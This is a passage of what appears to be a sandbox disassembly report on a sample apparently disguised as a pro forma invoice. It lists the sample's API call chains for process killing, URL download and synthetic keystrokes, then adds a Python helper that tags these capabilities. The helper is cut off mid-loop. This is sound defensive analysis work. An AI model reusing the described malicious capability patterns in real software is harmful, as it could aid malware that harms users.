                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00393D5B
                                    • DrawMenuBar.USER32 ref: 00393D63
                                    Strings
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                    • String ID: 0$F
                                    • API String ID: 161812096-3044882817
                                    • Opcode ID: 35c5217bf69ea8ba6ff6fb7f1ec5e08e03a8394bd19c182dfe856b9a365410cd
                                    • Instruction ID: 44f0fd3f8b167d117ad8a7fff05fa9a6a22b174b129c74f03ee5af31718911fc
                                    • Opcode Fuzzy Hash: 35c5217bf69ea8ba6ff6fb7f1ec5e08e03a8394bd19c182dfe856b9a365410cd
                                    • Instruction Fuzzy Hash: F4417CB9A01209EFDF15CFA4E854AAA7BB9FF49350F150029F94697360D731AA10CF94
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00393A9D
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00393AA0
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00393AC7
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00393AEA
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00393B62
                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00393BAC
                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00393BC7
                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00393BE2
                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00393BF6
                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00393C13
                                    Similarity
                                    • API ID: MessageSend$LongWindow
                                    • String ID:
                                    • API String ID: 312131281-0
                                    • Opcode ID: 9245a3dced86cb4afe146e400e809158a37b9bb1eb333d427fe8b269692d63f6
                                    • Instruction ID: 771250ab7feb24e1faee25dc82a61e33e602b7dd2cfcc3bd244640be0d88b027
                                    • Opcode Fuzzy Hash: 9245a3dced86cb4afe146e400e809158a37b9bb1eb333d427fe8b269692d63f6
                                    • Instruction Fuzzy Hash: 32615DB5900248AFDB12DFA8CC81EEE77F8EB09710F10415AFA15AB291D774AE45DF50
                                    APIs
                                    • _free.LIBCMT ref: 00332C94
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 00332CA0
                                    • _free.LIBCMT ref: 00332CAB
                                    • _free.LIBCMT ref: 00332CB6
                                    • _free.LIBCMT ref: 00332CC1
                                    • _free.LIBCMT ref: 00332CCC
                                    • _free.LIBCMT ref: 00332CD7
                                    • _free.LIBCMT ref: 00332CE2
                                    • _free.LIBCMT ref: 00332CED
                                    • _free.LIBCMT ref: 00332CFB
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 6b3128988df61f6254982760439f8542acfd5a32fa21f7d15356567385434b2c
                                    • Instruction ID: df96533031c4c1f8cbeb4518ea8636119906fbe73bf74f543e6d7ca1efd51e9e
                                    • Opcode Fuzzy Hash: 6b3128988df61f6254982760439f8542acfd5a32fa21f7d15356567385434b2c
                                    • Instruction Fuzzy Hash: C911A476100118AFCB03EF54E882DDE7BA5FF06350F4144A5FA489F222DB31EE609B90
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00301459
                                    • OleUninitialize.OLE32(?,00000000), ref: 003014F8
                                    • UnregisterHotKey.USER32(?), ref: 003016DD
                                    • DestroyWindow.USER32(?), ref: 003424B9
                                    • FreeLibrary.KERNEL32(?), ref: 0034251E
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0034254B
                                    Strings
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: b490e9e2d2b7671baf9783131e6f60203793c1770847597a3108de1ea4ee52c2
                                    • Instruction ID: 6438b4563b4b6a02c19bfefe75abe6178c07abf9c42196d2abc614210548d2bb
                                    • Opcode Fuzzy Hash: b490e9e2d2b7671baf9783131e6f60203793c1770847597a3108de1ea4ee52c2
                                    • Instruction Fuzzy Hash: 1BD15D31702212CFCB2BEF15C8A5A6AF7A4BF05700F55419DE84A6F2A2DB31AD52CF51
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00305C7A
                                      • Part of subcall function 00305D0A: GetClientRect.USER32(?,?), ref: 00305D30
                                      • Part of subcall function 00305D0A: GetWindowRect.USER32(?,?), ref: 00305D71
                                      • Part of subcall function 00305D0A: ScreenToClient.USER32(?,?), ref: 00305D99
                                    • GetDC.USER32 ref: 003446F5
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00344708
                                    • SelectObject.GDI32(00000000,00000000), ref: 00344716
                                    • SelectObject.GDI32(00000000,00000000), ref: 0034472B
                                    • ReleaseDC.USER32(?,00000000), ref: 00344733
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003447C4
                                    Strings
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 94358f2ef7a41bc8bc1eaa70e47b14f51156ac89d728a2c73a23f3920c95ee43
                                    • Instruction ID: 693ec78102444a986bd51cacc6605ecf9682b3a7785d5d1e491d5104bc21ffe5
                                    • Opcode Fuzzy Hash: 94358f2ef7a41bc8bc1eaa70e47b14f51156ac89d728a2c73a23f3920c95ee43
                                    • Instruction Fuzzy Hash: F271BD31401205DFDF23CF64C984AAA7BF9FF4A360F15427AE9655E1A6C731A882DF60
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003735E4
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • LoadStringW.USER32(003D2390,?,00000FFF,?), ref: 0037360A
                                    Strings
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-2391861430
                                    • Opcode ID: 986acc37108dc914607785965f6b61073990370a25f28ba2f65d57beb2f3b624
                                    • Instruction ID: 322cb6b8e18fd3f8c78397a6f68ded711686e027a6c3e10f58771afd53c88db2
                                    • Opcode Fuzzy Hash: 986acc37108dc914607785965f6b61073990370a25f28ba2f65d57beb2f3b624
                                    • Instruction Fuzzy Hash: AC516071901249BBDF17EBA0DC92EEEBB78AF04300F148166F105761A2DB315A99DFA1
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0037C272
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0037C29A
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0037C2CA
                                    • GetLastError.KERNEL32 ref: 0037C322
                                    • SetEvent.KERNEL32(?), ref: 0037C336
                                    • InternetCloseHandle.WININET(00000000), ref: 0037C341
                                    Strings
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 75012f665f5671c1adc70ed3a21b0ae74cc8654225a09b0d4067c4870bd2a68c
                                    • Instruction ID: a6022cdd7b3b94792446e65df77a7080646251d20874aaa6e57cc1a224ac5294
                                    • Opcode Fuzzy Hash: 75012f665f5671c1adc70ed3a21b0ae74cc8654225a09b0d4067c4870bd2a68c
                                    • Instruction Fuzzy Hash: D1319175510608AFEB339FA48C84AAB7BFCEB49740F14D51EF44A96201DB39DD049B60
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00343AAF,?,?,Bad directive syntax error,0039CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003698BC
                                    • LoadStringW.USER32(00000000,?,00343AAF,?), ref: 003698C3
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00369987
                                    Strings
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 858772685-4153970271
                                    • Opcode ID: 42caf50f21e30b83cd84b7e03f7e02032b387b53abf708425475eff7d03cfdf6
                                    • Instruction ID: d5018e8c4ff123aa0fb646858f51165199d8bb08872e7c65b946f56d4b7ae2e0
                                    • Opcode Fuzzy Hash: 42caf50f21e30b83cd84b7e03f7e02032b387b53abf708425475eff7d03cfdf6
                                    • Instruction Fuzzy Hash: 88215C3191021AABCF17EF90CC56FEE7779BF18300F04846AF5156A0A2EB71AA58DB51
                                    APIs
                                    • GetParent.USER32 ref: 003620AB
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 003620C0
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0036214D
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameParentSend
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1290815626-3381328864
                                    • Opcode ID: c9bb1fc8aeb2ae450d0ccfebe2270a65c46cd71daebd3462eebadd9d2d0716a0
                                    • Instruction ID: 9af3211869f11752d23c779bdc48491fb589db933f8b9f74bf2bf76e7b4c6b8e
                                    • Opcode Fuzzy Hash: c9bb1fc8aeb2ae450d0ccfebe2270a65c46cd71daebd3462eebadd9d2d0716a0
                                    • Instruction Fuzzy Hash: CE11067668CB16BAFA036720EC06DE77B9CDB16324F22401AFB04E90D5EE61AC525624
                                    APIs
                                    Similarity
                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 1282221369-0
                                    • Opcode ID: b8c1e52b3d8ce872ca2c0874a7e3b4cd733113937fc22f1ab98d93f6d1c43a25
                                    • Instruction ID: f0a3d08ba14fc3f01ab8716383e282bf789240918d705b81003401d2182c20fc
                                    • Opcode Fuzzy Hash: b8c1e52b3d8ce872ca2c0874a7e3b4cd733113937fc22f1ab98d93f6d1c43a25
                                    • Instruction Fuzzy Hash: 0A613871905310AFDB27AFB4A8C1B6E7BAAEF05710F15416EF944BB291D7329D01C750
                                    APIs
                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00395186
                                    • ShowWindow.USER32(?,00000000), ref: 003951C7
                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 003951CD
                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003951D1
                                      • Part of subcall function 00396FBA: DeleteObject.GDI32(00000000), ref: 00396FE6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0039520D
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0039521A
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0039524D
                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00395287
                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00395296
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                    • String ID:
                                    • API String ID: 3210457359-0
                                    • Opcode ID: 0270bf7a46cc025498a74767b142952bcb7084f8518c048c473884daefa696ba
                                    • Instruction ID: c5f984ae4cad2f492e6b17cbc241d451bc4cc72a6fa932a69e70bf99a6535fc2
                                    • Opcode Fuzzy Hash: 0270bf7a46cc025498a74767b142952bcb7084f8518c048c473884daefa696ba
                                    • Instruction Fuzzy Hash: 7451C030A51A08BFEF279F24CC4ABD97B69FF05321F258412F6559A2E0C375A9C0DB40
                                    APIs
                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00356890
                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003568A9
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003568B9
                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003568D1
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003568F2
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00318874,00000000,00000000,00000000,000000FF,00000000), ref: 00356901
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0035691E
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00318874,00000000,00000000,00000000,000000FF,00000000), ref: 0035692D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 1268354404-0
                                    • Opcode ID: 289a80960a9034c97f6a172967534bc220394bd02d29c6db05ce361d0bc5346c
                                    • Instruction ID: 6f2d4db759c7973f7af9e08f6a39b9fd0fef985f2f06795a38aab01d3ce24b71
                                    • Opcode Fuzzy Hash: 289a80960a9034c97f6a172967534bc220394bd02d29c6db05ce361d0bc5346c
                                    • Instruction Fuzzy Hash: FF51AC70600209EFDB26CF25CC52FAA7BB9FF48350F108519F906972A0DB71E994DB50
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0037C182
                                    • GetLastError.KERNEL32 ref: 0037C195
                                    • SetEvent.KERNEL32(?), ref: 0037C1A9
                                      • Part of subcall function 0037C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0037C272
                                      • Part of subcall function 0037C253: GetLastError.KERNEL32 ref: 0037C322
                                      • Part of subcall function 0037C253: SetEvent.KERNEL32(?), ref: 0037C336
                                      • Part of subcall function 0037C253: InternetCloseHandle.WININET(00000000), ref: 0037C341
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 337547030-0
                                    • Opcode ID: 41b5fcc9594cfec24c78905862825bb1645d5920b1e85418544db7621257893e
                                    • Instruction ID: 1e166b076ffcdc2847c1c4b1753d3ac51a2f24a087e473caadcd098b7297e64e
                                    • Opcode Fuzzy Hash: 41b5fcc9594cfec24c78905862825bb1645d5920b1e85418544db7621257893e
                                    • Instruction Fuzzy Hash: 1631A171120605AFDF329FA5DC44A66BBFCFF18300F04A82EF95A86611C739E810DB60
                                    APIs
                                      • Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
                                      • Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
                                      • Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003625BD
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003625DB
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003625DF
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003625E9
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00362601
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00362605
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0036260F
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00362623
                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00362627
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 4a48525477e77f9f0bbed7be137fcd00a8f9faf521abea347be0626afdce88f3
                                    • Instruction ID: 62ac54ea9d58e7dd5eed18682ad0b5b907098e34cc12818c0eca01b917bb2a25
                                    • Opcode Fuzzy Hash: 4a48525477e77f9f0bbed7be137fcd00a8f9faf521abea347be0626afdce88f3
                                    • Instruction Fuzzy Hash: B101D4303A0610BBFB216769DC8AF5A7F5DDF4EB52F105012F358AE0D5C9E22844DA6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00361449,?,?,00000000), ref: 0036180C
                                    • HeapAlloc.KERNEL32(00000000,?,00361449,?,?,00000000), ref: 00361813
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00361449,?,?,00000000), ref: 00361828
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00361449,?,?,00000000), ref: 00361830
                                    • DuplicateHandle.KERNEL32(00000000,?,00361449,?,?,00000000), ref: 00361833
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00361449,?,?,00000000), ref: 00361843
                                    • GetCurrentProcess.KERNEL32(00361449,00000000,?,00361449,?,?,00000000), ref: 0036184B
                                    • DuplicateHandle.KERNEL32(00000000,?,00361449,?,?,00000000), ref: 0036184E
                                    • CreateThread.KERNEL32(00000000,00000000,00361874,00000000,00000000,00000000), ref: 00361868
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                    • String ID:
                                    • API String ID: 1957940570-0
                                    • Opcode ID: 47ab6bae1bed7e186a48e081d746097e8ad5d7b3c9c868aae2bf8cf5f1491ff8
                                    • Instruction ID: e563ad1fbce61b2d57c504bdd80a1c3f4b73b7a74a5465acd95e260744ee9ad4
                                    • Opcode Fuzzy Hash: 47ab6bae1bed7e186a48e081d746097e8ad5d7b3c9c868aae2bf8cf5f1491ff8
                                    • Instruction Fuzzy Hash: 0C01BBB5250308BFE711ABA5DD4EF6B3BACEB89B11F409412FA05DB1A1CA759800CB34
                                    APIs
                                      • Part of subcall function 0036D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0036D501
                                      • Part of subcall function 0036D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0036D50F
                                      • Part of subcall function 0036D4DC: CloseHandle.KERNEL32(00000000), ref: 0036D5DC
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038A16D
                                    • GetLastError.KERNEL32 ref: 0038A180
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038A1B3
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0038A268
                                    • GetLastError.KERNEL32(00000000), ref: 0038A273
                                    • CloseHandle.KERNEL32(00000000), ref: 0038A2C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: d1a65d83911a115e8cce5cf01428e077d3d9299dda14f0a24832e03c0da8f951
                                    • Instruction ID: 9ea4af31b824b0271ae9d7ea3350ccd00b64b2ca22c6e472cc779949bbb6283e
                                    • Opcode Fuzzy Hash: d1a65d83911a115e8cce5cf01428e077d3d9299dda14f0a24832e03c0da8f951
                                    • Instruction Fuzzy Hash: 0261AB702047029FE722EF18C494F16BBA5AF44318F19848DE4668FBA3C776EC45CB92
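The chains in the blocks above are what a reviewer has to read hundreds of times in an export like this, and in a binary the report rates as likely compiled AutoIt most of them are the interpreter's runtime (process enumeration followed by OpenProcess/TerminateProcess under SeDebugPrivilege, a WinINet connect-and-open-URL worker with an event to signal completion, AttachThreadInput followed by posted key messages) rather than payload logic. The helper below is an added example, not Joe Sandbox's, AutoIt's or the sample's own code: it parses the "Api.MODULE(args), ref: ADDR" line format shown on this page, tags each function with the capability its API set implies, and decodes the two argument fields that actually carry a verdict here, the OpenProcess access mask (0x1 is PROCESS_TERMINATE) and the PostMessageW message/virtual-key pair (0x100 and 0x101 are WM_KEYDOWN and WM_KEYUP; 0x25 and 0x27 are VK_LEFT and VK_RIGHT). The rule table and tag names are this example's own choices; the two sample blocks are copied from this page's own "APIs" listings.

```python
"""Capability triage over the per-function "APIs" blocks of a Joe Sandbox
IDA-plugin export. Added example; not Joe Sandbox or AutoIt code. Assumed
line format, as printed on this page: "Api.MODULE(arg,...), ref: ADDR",
optionally prefixed by "Part of subcall function ADDR:"; unresolved args are "?"."""
import re

API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# OpenProcess access-right bits (winnt.h PROCESS_* values).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
WM_CODES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR"}
VK_CODES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}
# A capability tag fires when every API in its set occurs in the same function
# (tag names and rule sets are this example's own, hypothetical choices).
RULES = [
    ("process-enumeration", {"CreateToolhelp32Snapshot", "Process32FirstW"}),
    ("process-termination", {"OpenProcess", "TerminateProcess"}),
    ("wininet-download", {"InternetConnectW", "InternetOpenUrlW"}),
    ("synthetic-keystrokes", {"AttachThreadInput", "PostMessageW"}),
    ("handle-duplication-thread", {"DuplicateHandle", "CreateThread"}),
]


def parse_block(text):
    """One dict per API line; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                          "ref": int(m.group("ref"), 16), "subcall": m.group("sub")})
    return calls


def hex_arg(arg):
    """Joe prints unresolved stack arguments as '?'; everything else is hex."""
    return None if arg == "?" else int(arg, 16)


def decode_access(mask):
    names = [n for bit, n in PROCESS_RIGHTS.items() if mask & bit]
    return "|".join(names) if names else f"0x{mask:x}"


def vk_name(code):
    return "?" if code is None else VK_CODES.get(code, f"0x{code:x}")


def triage(text):
    """Tag capabilities and decode the arguments that matter for a verdict."""
    calls = parse_block(text)
    seen = {c["api"] for c in calls}
    caps = [tag for tag, needed in RULES if needed <= seen]
    notes = []
    for c in calls:
        if c["api"] == "OpenProcess" and c["args"] and hex_arg(c["args"][0]) is not None:
            notes.append(f"OpenProcess access={decode_access(hex_arg(c['args'][0]))} @{c['ref']:08X}")
        elif c["api"] == "PostMessageW" and len(c["args"]) >= 3 and hex_arg(c["args"][1]) in WM_CODES:
            notes.append(f"{WM_CODES[hex_arg(c['args'][1])]} {vk_name(hex_arg(c['args'][2]))} @{c['ref']:08X}")
    return {"calls": len(calls), "capabilities": caps, "notes": notes}


# Sample input copied from this report's own "APIs" blocks (kill routine, keystroke routine).
SAMPLE_PROCESS_KILL = """\
• Part of subcall function 0036D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0036D501
• Part of subcall function 0036D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0036D50F
• Part of subcall function 0036D4DC: CloseHandle.KERNEL32(00000000), ref: 0036D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038A16D
• GetLastError.KERNEL32 ref: 0038A180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038A1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0038A268
• GetLastError.KERNEL32(00000000), ref: 0038A273
• CloseHandle.KERNEL32(00000000), ref: 0038A2C4
"""
SAMPLE_KEYSTROKES = """\
• Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
• Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
• Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003625BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003625DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003625DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003625E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00362601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00362605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0036260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00362623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00362627
"""

if __name__ == "__main__":
    for name, block in (("kill", SAMPLE_PROCESS_KILL), ("keys", SAMPLE_KEYSTROKES)):
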